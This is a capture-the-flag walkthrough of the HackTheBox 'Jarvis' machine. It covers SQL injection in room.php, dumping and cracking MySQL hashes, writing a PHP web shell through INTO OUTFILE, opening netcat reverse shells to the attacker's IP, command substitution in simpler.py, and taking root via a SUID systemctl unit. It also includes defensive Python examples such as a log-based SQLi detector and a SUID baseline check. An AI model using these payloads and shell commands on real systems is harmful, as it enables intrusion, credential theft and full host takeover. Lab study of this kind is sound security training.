# Jarvis

This is a medium-difficulty Linux machine from [HackTheBox](https://app.hackthebox.com/machines/37) created by manulqwerty and Gh0spp7. In this scenario, my IP is 10.10.14.56 and the target's IP is 10.129.16.167.

### Gathering Information

Before doing anything, start with ping to check that the target is reachable.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.16.167
```

{% endcode %}

<figure><img src="/files/PBgawOViva6BAAewW3dc" alt=""><figcaption><p>TTL is around 63, so it’s a Linux Machine</p></figcaption></figure>

Using nmap, we scan all ports and report only the open ones (-p- --open) at the most aggressive timing template (-T5) and without DNS resolution (-n). If you want more speed, you can use **nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.16.167**, a suggestion by [S4vitaar](https://www.twitch.tv/s4vitaar).

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.16.167
```

{% endcode %}

<figure><img src="/files/sz4AcdJ4W8BCbBA6WAEx" alt=""><figcaption><p>nmap’s output</p></figcaption></figure>

Now we gather additional information by running nmap's default scripts (-sC) together with version detection (-sV) against the ports found.

{% code title="Local Terminal" %}

```bash
nmap -sC -sV -p 22,80,64999 10.129.16.167
```

{% endcode %}

<figure><img src="/files/tTZdujwGX96mo7Bhz5G6" alt=""><figcaption></figcaption></figure>

The important findings are **port 80 (HTTP) open**, with a website served by Apache, and another website on port 64999. We need more details on both.

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.16.167
```

{% endcode %}

<figure><img src="/files/H3tz19TojyaKKSOPIvoL" alt=""><figcaption></figcaption></figure>

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.16.167:64999
```

{% endcode %}

<figure><img src="/files/QWjYTSfAE2dttWrDVeRA" alt=""><figcaption></figcaption></figure>

From both, the relevant piece of information is the email address <supersecurehotel@logger.htb>. Next we open the website in the browser and explore it, looking for a URL that takes user input.

* Browser:    <http://10.129.16.167>

If you pick a room, the URL carries a parameter that selects the room type. Let's try two things: first, what happens if you use an invalid number, and then a SQL injection test by appending " or 1=1 -- -" to the URL.

<figure><img src="/files/FRT7FJRudVic1SXvouhe" alt=""><figcaption><p>Website after picking a room</p></figcaption></figure>

* Browser     <http://10.129.16.167/room.php?cod=-1> or 1=1 -- -
  * This one show information, it is a good signal
* Browser:    <http://10.129.16.167/room.php?cod=-1> order by 1-- -&#x20;
  * Tried with order by from 1 to 9, but nothing happens.
* Browser:    <http://10.129.16.167/room.php?cod=-1> union select 1,2,3,4,5,6,7-- -
  * It shows information if you try by selecting every column until 7.

<figure><img src="/files/XPq5GiJMPdssI4KnUHdK" alt=""><figcaption><p>website’s output by using select from 1 to 7</p></figcaption></figure>

* Browser:    <http://10.129.16.167/room.php?cod=-1> union select 1,2,NULL,4,5,6,7-- -

Ok, there is no doubt that this website is vulnerable to SQL injection. Now we test what kind of information we can extract from it.
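To see why the cod parameter behaves this way, here is an added Python example (not the machine's room.php, which this write-up only shows through screenshots) that reproduces the bug with an in-memory SQLite table standing in for the hotel database. The table's column names are constructed; only the column count of seven comes from the UNION payload above. It runs the same kind of payload against a string-concatenated query, a parameterized query, and a query that validates cod as an integer first. Single quotes are used around 'test' because SQLite treats double-quoted strings as identifiers.

```python
import sqlite3

# Constructed stand-in for the hotel "room" table; column names are assumptions,
# only the column count (7) comes from the UNION payload in the write-up.
SCHEMA = """
CREATE TABLE room (
    cod INTEGER PRIMARY KEY, name TEXT, price INTEGER,
    description TEXT, stars INTEGER, image TEXT, thumbnail TEXT
);
INSERT INTO room VALUES (1, 'Superior Family Room', 175, 'Two beds', 4, 'r1.jpg', 'r1s.jpg');
INSERT INTO room VALUES (2, 'Double Room', 250, 'Sea view', 5, 'r2.jpg', 'r2s.jpg');
"""

# Same shape as the payload used against room.php above (single quotes for SQLite).
PAYLOAD = "-1 union select 1,2,'test',4,5,6,7-- -"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def room_vulnerable(conn, cod):
    # Assumed behaviour of room.php: the parameter is pasted into the SQL text,
    # so anything after the number becomes part of the statement.
    sql = "SELECT * FROM room WHERE cod=" + cod
    return conn.execute(sql).fetchall()


def room_parameterized(conn, cod):
    # Hardened: the value is bound as data; the engine never parses it as SQL.
    return conn.execute("SELECT * FROM room WHERE cod=?", (cod,)).fetchall()


def room_validated(conn, cod):
    # Hardened further: enforce the expected type before the value reaches the DB,
    # so malformed input is rejected at the edge with a clear error.
    try:
        cod_int = int(cod)
    except (TypeError, ValueError):
        raise ValueError("cod must be an integer")
    return room_parameterized(conn, cod_int)


def demo():
    """Run the same payload through the three variants and report what each returns."""
    conn = new_db()
    results = {
        "legit": room_vulnerable(conn, "1"),
        "vulnerable": room_vulnerable(conn, PAYLOAD),
        "parameterized": room_parameterized(conn, PAYLOAD),
    }
    try:
        room_validated(conn, PAYLOAD)
        results["validated"] = "accepted"
    except ValueError:
        results["validated"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:14} -> {value}")
```

The vulnerable variant returns the attacker-chosen row (1, 2, 'test', 4, 5, 6, 7), which is exactly the behaviour seen in the screenshots; the parameterized variant returns nothing because the whole string is compared against the integer column, and the validating variant refuses the request before any SQL runs.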

* Browser:    <http://10.129.16.167/room.php?cod=-1> union select 1,2,"test",4,5,6,7-- -

<figure><img src="/files/v6CNAfFR21Ez5zp1Uq9x" alt=""><figcaption><p>It works, we can put strings</p></figcaption></figure>

* Browser:    <http://10.129.16.167/room.php?cod=-1> union select 1,2,database(),4,5,6,7-- -

<figure><img src="/files/dCSd4IiMqDV5qJr643lC" alt=""><figcaption><p>Even Commands!</p></figcaption></figure>

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,version(),4,5,6,7-- -

<div align="center"><figure><img src="/files/mgcwiwS36DqfganSmdiu" alt=""><figcaption></figcaption></figure></div>

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,user(),4,5,6,7-- -

<figure><img src="/files/NBYqZil5RE7eUNVI0Qa1" alt=""><figcaption></figcaption></figure>

* Browser:    <http://10.129.16.167/room.php?cod=-1> union select 1,2,load\_file("/etc/passwd"),4,5,6,7-- -

Press **CTRL + U** (view page source) to read the file contents in a friendlier format.

<figure><img src="/files/12bcqGKmvOR4MTErFXQH" alt=""><figcaption><p>Loaded file viewed with CTRL+U. There are two users with bash available</p></figcaption></figure>

In some cases, many strings are blacklisted, so you can hex-encode them with **echo "/etc/passwd" | tr -d '\n' | xxd -ps** and paste the output prefixed with 0x as an unquoted hex literal to get around the filter (in quotes, MySQL would look for a file literally named 0x2f...). The result will look like: **<http://10.129.16.167/room.php?cod=-1> union select 1,2,load\_file(0x2f6574632f706173737764),4,5,6,7-- -**
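From the defender's side, every payload in this section leaves a distinctive trail in the Apache access log. The following added Python script (my example, not part of the original write-up) URL-decodes the query string of each request and flags the patterns used above, including the hex-encoded load_file argument and the INTO OUTFILE write used later on this page. The log lines are constructed to mirror the requests described here.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines modelled on the requests in this write-up.
SAMPLE_LOG = """\
10.10.14.56 - - [12/Mar/2024:10:01:02 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.10.14.56 - - [12/Mar/2024:10:01:09 +0000] "GET /room.php?cod=-1%20or%201=1--%20- HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
10.10.14.56 - - [12/Mar/2024:10:02:15 +0000] "GET /room.php?cod=-1%20union%20select%201,2,database(),4,5,6,7--%20- HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.56 - - [12/Mar/2024:10:03:40 +0000] "GET /room.php?cod=-1%20union%20select%201,2,load_file(0x2f6574632f706173737764),4,5,6,7--%20- HTTP/1.1" 200 4099 "-" "Mozilla/5.0"
10.10.14.56 - - [12/Mar/2024:10:05:01 +0000] "GET /room.php?cod=-1%20union%20select%201,2,%22%3C?php%20system($_REQUEST[%27cmd%27]);%20?%3E%22,4,5,6,7%20into%20outfile%20%22/var/www/html/CMD.php%22--%20- HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
10.10.14.57 - - [12/Mar/2024:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each rule is (name, regex applied to the URL-decoded parameter value).
RULES = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
    ("tautology",    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I)),
    ("comment_tail", re.compile(r"(--\s|#|/\*)")),
    ("load_file",    re.compile(r"\bload_file\s*\(", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("info_schema",  re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I)),
    ("hex_literal",  re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),
    ("php_tag",      re.compile(r"<\?php", re.I)),
]


def decode_param_values(url):
    """Yield (name, value) for each query parameter, decoded twice to catch double-encoding.
    Splitting on '&' by hand avoids parse_qsl treating ';' inside a payload as a separator."""
    query = urlsplit(url).query
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        yield name, unquote_plus(unquote_plus(value))


def scan_log(text):
    """Return one finding per request whose parameters match at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = set()
        for _name, value in decode_param_values(m["url"]):
            for rule_name, rx in RULES:
                if rx.search(value):
                    hits.add(rule_name)
        if hits:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "url": m["url"], "rules": sorted(hits),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["rules"]), f["url"][:70])
```

Four of the six constructed requests are flagged; note that a 200 status on every one of them is itself a signal that the application accepted the injected statements rather than rejecting them.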

#### Exploitation

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,schema\_name,4,5,6,7 from information\_schema.schemata limit 0,1-- -

<figure><img src="/files/ChvRCQVe40NBVSTkpPvO" alt=""><figcaption></figcaption></figure>

Here you have to step through the offsets (limit 1,1, limit 2,1, ...) because the injected column only shows one row at a time, or use group\_concat(schema\_name) to list all of them in a single request.

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,table\_name,4,5,6,7 from information\_schema.tables where table\_schema="hotel" limit 0,1-- -

<figure><img src="/files/n3I52NyXW4Q2UctHAdkl" alt=""><figcaption></figcaption></figure>

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,group\_concat(column\_name),4,5,6,7 from information\_schema.columns where table\_schema="hotel" and table\_name="room" limit 0,1-- -

<figure><img src="/files/0kTNd2ji3mDJa4SPU5zv" alt=""><figcaption></figcaption></figure>

This table holds the data of every room. You can get the same information with sqlmap; details at the bottom.

* Browser:         <http://10.129.16.167/room.php?cod=-1> union select 1,2,group\_concat(User,0x3a,Password),4,5,6,7 from mysql.user-- -

<figure><img src="/files/HXgLvDDQl73O977u1JDn" alt=""><figcaption></figcaption></figure>

This is the relevant find: we now have the administrator's credentials, but the password is stored as a hash that we have to crack {DBadmin:\*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0}

* Browser:         <https://crackstation.net/>

<figure><img src="/files/CbSGwQQM0Q1pItYcCZtw" alt=""><figcaption><p>It works!</p></figcaption></figure>

If the hash is more complex and not in crackstation.net, you can use the commands **hashid** and **hash-identifier** in your terminal to get the type, and then **hashcat -m 300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt**, where hash.txt contains the target hash and -m selects the hash mode (300 = MySQL4.1).
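A note on the hash itself: MySQL's PASSWORD() / mysql_native_password value is not encrypted, it is '*' followed by SHA1(SHA1(password)) in uppercase hex, which is why it can only be guessed and checked, never reversed, and why hashcat mode 300 applies. The added Python below (not from the write-up) identifies that format from its shape and verifies a candidate password against a stored hash in constant time; the DBadmin hash is the one dumped above, and the password used in the test is a constructed value.

```python
import hashlib
import hmac
import re

# Hash taken from the write-up (the DBadmin entry dumped from mysql.user).
TARGET_HASH = "*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0"

MYSQL41_RE = re.compile(r"^\*[0-9A-Fa-f]{40}$")   # '*' + 40 hex chars
MYSQL_OLD_RE = re.compile(r"^[0-9a-f]{16}$")       # pre-4.1 OLD_PASSWORD, 16 hex chars


def mysql41_hash(password):
    """PASSWORD()/mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def identify_mysql_hash(stored):
    """Classify a value pulled from mysql.user by its shape, with the matching hashcat mode."""
    if MYSQL41_RE.match(stored):
        return "mysql_native_password (MySQL 4.1+, hashcat -m 300)"
    if MYSQL_OLD_RE.match(stored):
        return "OLD_PASSWORD (pre-4.1, hashcat -m 200)"
    return "not a MySQL PASSWORD() hash"


def verify_mysql41(stored, candidate):
    """Constant-time check of a candidate password against a stored 4.1+ hash."""
    return hmac.compare_digest(stored.upper(), mysql41_hash(candidate))


if __name__ == "__main__":
    print(TARGET_HASH, "->", identify_mysql_hash(TARGET_HASH))
    demo = mysql41_hash("constructed-demo-password")   # constructed value, not the machine's
    print(demo, verify_mysql41(demo, "constructed-demo-password"))
```

Because the scheme is an unsalted double SHA1, identical passwords always produce identical hashes, which is what makes lookup services like crackstation effective against it; from the defender's side it is one more reason to keep the application's database account away from mysql.user entirely.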

#### MACHINE RESET - NEW IP (**10.129.212.38**)

Now that we have the administrator's username and password, we need a place to log in, and nmap can help us find it.

{% code title="Local Terminal" %}

```bash
nmap --script http-enum -p80 10.129.212.38
```

{% endcode %}

<figure><img src="/files/k7YLPQm6OcpyWKxXWvpI" alt=""><figcaption><p>nmap's output</p></figcaption></figure>

phpMyAdmin is the obvious place to test the new credentials; open your browser and go to <http://10.129.212.38/phpmyadmin/>

<figure><img src="/files/oEg6TH6ohPZm5LIc4kpE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8WHUlFsWxNijzKJ4gFnX" alt=""><figcaption></figcaption></figure>

This is important: from phpMyAdmin we can run arbitrary SQL queries and use them to learn about, and write to, the host. Example of what we can do:

<figure><img src="/files/Xhc5F9RQ8zaVHeNsXDf7" alt=""><figcaption><p>Creation of a file with SQL</p></figcaption></figure>

* Browser:         <http://10.129.212.38/datatest.txt>

<figure><img src="/files/ZkQpoJP4s3IxlspENNcQ" alt=""><figcaption><p>It works!</p></figcaption></figure>

But enough exploration. Now that we have admin permissions we can take the following steps to get onto the machine:

* Browser:         <http://10.129.212.38/room.php?cod=-1> union select 1,2,"\<?php system('whoami'); ?>",4,5,6,7 into outfile "/var/www/html/testing.php"-- -
* Browser:         <http://10.129.212.38/testing.php>

<figure><img src="/files/a4omnYKazITmQK5rZGdZ" alt=""><figcaption><p>Output of target's whoami</p></figcaption></figure>

We can execute commands, so next we write a web shell that takes the command as a parameter and then use it to get a reverse shell.

* Browser:         <http://10.129.212.38/room.php?cod=-1> union select 1,2,"\<?php system($\_REQUEST\['cmd']); ?>",4,5,6,7 into outfile "/var/www/html/CMD.php"-- -
* Browser:         <http://10.129.212.38/CMD.php>

<figure><img src="/files/3GJZoQ6szICnjBnGSV2J" alt=""><figcaption></figcaption></figure>

Column 3 no longer shows anything (the PHP was executed instead of printed), and now we control what runs by adding ?cmd=**COMMAND** to the URL.

* Browser:                     <http://10.129.212.38/CMD.php?cmd=whoami>

<figure><img src="/files/VgVAu8DJIJzjewv9hgke" alt=""><figcaption><p>Perfect!</p></figcaption></figure>

So now we want a proper bash shell, which takes two steps: listen locally, then connect back from the target.

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

* Browser:         <http://10.129.212.38/CMD.php?cmd=which> nc
  * To check whether nc exists on the target
* Browser:         <http://10.129.212.38/CMD.php?cmd=nc> -e /bin/bash 10.10.14.56 443

<figure><img src="/files/cA133fSXPNRPkuIPCPBL" alt=""><figcaption><p>Terminal Screen.</p></figcaption></figure>

We are in, so now we only need a [TTY treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md) to get a functional shell with shortcuts.

{% code title="Target Terminal" %}

```bash
cd /home/pepper
ls -l
```

{% endcode %}

<figure><img src="/files/45AZfSH9KKxJzBS84buo" alt=""><figcaption><p>As you can see, as the current user we can't read the file user.txt</p></figcaption></figure>

{% code title="Target Terminal" %}

```bash
id
sudo -l
```

{% endcode %}

<figure><img src="/files/HsAW0DO53e77B0wbtwr9" alt=""><figcaption></figcaption></figure>

We are www-data, as expected, but sudo -l shows that this user may run **simpler.py** as pepper.

{% code title="Target www-data" %}

```bash
sudo -u pepper /var/www/Admin-Utilities/simpler.py
```

{% endcode %}

<figure><img src="/files/G1g258k6eiIgn3AxlX5C" alt=""><figcaption><p>simpler.py's menu</p></figcaption></figure>

{% code title="Target www-data" %}

```bash
vi /var/www/Admin-Utilities/simpler.py
```

{% endcode %}

<figure><img src="/files/R9nY1gM9XMckcgOkt8no" alt=""><figcaption></figcaption></figure>

It looks like a small test-and-defence utility, and the function shown in the image looks exploitable through command substitution. First we need to create a script file.

{% code title="Target www-data" %}

```bash
cd /tmp/
vi reverse.sh
```

{% endcode %}

{% code title="reverse.sh" %}

```bash
#!/bin/bash

nc -e /bin/bash 10.10.14.56 443
```

{% endcode %}

{% code title="Target www-data" %}

```bash
chmod +x reverse.sh
```

{% endcode %}

Now open a new local terminal, because reverse.sh will connect back to it.

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Target www-data" %}

```bash
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
```

{% endcode %}

{% code title="Target simpler.py" %}

```bash
$(bash /tmp/reverse.sh)
```

{% endcode %}

<figure><img src="/files/jJUnDCnC7yJ9mtPwx76a" alt=""><figcaption></figcaption></figure>
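What makes the ping option exploitable is the pattern of concatenating user input into a shell command and relying on a character denylist: `$(...)` is not on the list, so the substitution still runs. The write-up only shows simpler.py in screenshots, so the denylist version below is my reconstruction of that pattern, not the machine's code, and the hardened version is an added example rather than anything from the project: it validates the target as an IP address or hostname and hands it to ping as a single argv element, so no shell is ever involved.

```python
import ipaddress
import re
import subprocess

# Reconstruction of the denylist pattern (constructed; not simpler.py's actual list):
# a handful of shell metacharacters are rejected and everything else reaches a shell.
DENYLIST = set("&;|`<>")


def denylist_allows(target):
    """Denylist check: True means the input would be accepted and run through a shell."""
    return not any(ch in DENYLIST for ch in target)


def vulnerable_command_line(target):
    """The dangerous shape: input concatenated into a shell command string (built, never run here)."""
    return "ping -c 1 " + target


# RFC 1123-style hostname: labels of letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def is_valid_target(target):
    """Allowlist check: accept only an IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def build_ping_argv(target):
    """Hardened: validate first, then build an argv list so the shell never parses the input."""
    if not is_valid_target(target):
        raise ValueError(f"refusing to ping invalid target: {target!r}")
    return ["ping", "-c", "1", target]


def safe_ping(target, timeout=10):
    """Run ping without a shell; returns True if the host answered."""
    result = subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=timeout)
    return result.returncode == 0


if __name__ == "__main__":
    payload = "$(bash /tmp/reverse.sh)"   # the command substitution used in this write-up
    print("denylist accepts payload :", denylist_allows(payload))   # True: $ ( ) are not listed
    print("allowlist accepts payload:", is_valid_target(payload))   # False
    print("argv for 127.0.0.1       :", build_ping_argv("127.0.0.1"))
```

The allowlist also rejects values that begin with a hyphen, which closes the secondary problem of user input being interpreted as a ping option; with an argv list there is nothing left for a metacharacter to do.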

Now the second terminal is a new shell on the target as user pepper; apply the same [TTY treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md).

{% code title="Target Pepper" %}

```bash
cd
ls
cat user.txt
```

{% endcode %}

<figure><img src="/files/gK6eAGKxY15ni9rL1MOY" alt=""><figcaption><p>User Flag!</p></figcaption></figure>

#### Privilege Escalation

For privilege escalation, a good practice is to look for a custom command or anything unusual to abuse.

{% code title="Target Pepper" %}

```bash
cd ..
cd ..
id
find / -perm -4000 2>/dev/null
```

{% endcode %}

<figure><img src="/files/384WRLsF723Y6xaLhHFK" alt=""><figcaption><p>Output from find command</p></figcaption></figure>

This command lists the files with the SUID bit set, which run with their owner's privileges. In this case, **systemctl** is our target: with it we can register and start a service unit of our own, and the command in that unit runs as root.

<figure><img src="/files/FX9ONHVA344k7bQ8LJcP" alt=""><figcaption></figcaption></figure>

{% code title="Target Pepper" %}

```bash
cd privesc
cp /tmp/reverse.sh privesc.sh
```

{% endcode %}

Remember to change the port in privesc.sh to **444**; we don't want to interrupt the shell that is already working on 443.

<figure><img src="/files/9aMw7kD71nioVUbZqiPQ" alt=""><figcaption></figcaption></figure>

{% code title="Target Pepper" %}

```bash
nano privesc.service
```

{% endcode %}

<figure><img src="/files/BMCj7L4mnykieCQQXBvY" alt=""><figcaption><p>privesc.service</p></figcaption></figure>

Open a new local terminal and start listening with nc -nlvp 444.

{% code title="Local Terminal" %}

```bash
nc -nlvp 444
```

{% endcode %}

{% code title="Target Pepper" %}

```bash
systemctl link /home/pepper/privesc/privesc.service
systemctl enable --now /home/pepper/privesc/privesc.service
```

{% endcode %}

<figure><img src="/files/gbxHyZpsqbOH2cxIeJKC" alt=""><figcaption></figcaption></figure>

Now you are connected as root.

{% code title="Target Root" %}

```bash
script /dev/null -c bash
ls
cd root
ls
cat root.txt
```

{% endcode %}

<figure><img src="/files/MVpXuQu9mm1uOVkoXHQ3" alt=""><figcaption><p>Admin flag!</p></figcaption></figure>
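The root cause of this last step is a SUID bit on systemctl, which a stock system does not carry. The added Python below (not from the write-up) is a small baseline check for exactly that: it compares the SUID binaries found on a host against an expected set and reports the rest. The expected set is a constructed starting point for a Debian-style image that you would trim to your own build, and the file modes used in the test are constructed as well.

```python
import os
import stat

# Constructed baseline for a Debian-style image: SUID binaries expected out of the box.
# Trim or extend it for the hosts you actually run; anything else found is reported.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Pseudo-filesystems that are noisy and never hold real SUID binaries.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setuid(mode):
    """True when the mode bits carry the SUID flag (the same test as find / -perm -4000)."""
    return bool(mode & stat.S_ISUID)


def unexpected_suid(entries, baseline=EXPECTED_SUID):
    """entries: iterable of (path, st_mode). Returns SUID files that are not in the baseline."""
    return sorted(path for path, mode in entries if is_setuid(mode) and path not in baseline)


def scan_filesystem(root="/"):
    """Walk the filesystem and yield (path, st_mode) for regular files, skipping pseudo-filesystems."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue              # unreadable or vanished file; keep going
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


if __name__ == "__main__":
    for path in unexpected_suid(scan_filesystem()):
        print("unexpected SUID:", path)
```

Run periodically (or from a file-integrity tool) this turns the one-off `find` from the write-up into a check with a known-good answer, so a SUID systemctl or any similar addition shows up as a diff rather than as something a reviewer has to notice by eye.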

### Alternative: SQLmap

At the SQL injection step, another option is sqlmap. First, get the session cookie from the website.

<figure><img src="/files/JgGsMb3kIxgg9HMRKlXe" alt=""><figcaption></figcaption></figure>

{% code title="Local Terminal" %}

```bash
sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' --dbs
```

{% endcode %}

<figure><img src="/files/UUp19tFQBua3NMO1elCi" alt=""><figcaption><p>sqlmap's output, there are 4 DBs</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' -D hotel --tables
```

{% endcode %}

<figure><img src="/files/Rhy0EaWURrLy3UG44Qb6" alt=""><figcaption><p>sqlmap output, there is one table at the hotel DB</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' -D hotel -T room --dump
```

{% endcode %}

<figure><img src="/files/07IRumJqZyzIwnHtyIdv" alt=""><figcaption><p>Location of the output</p></figcaption></figure>

Now go to that location and read the file, or move it to your current directory with: **mv /home/robertoalfaro/.local/share/sqlmap/output/10.129.16.167/dump/hotel/room.csv .**

<figure><img src="/files/xT7iNHFpZD6Ljwp1DDXo" alt=""><figcaption></figcaption></figure>

You can do the same to get the credentials from the database named "mysql".

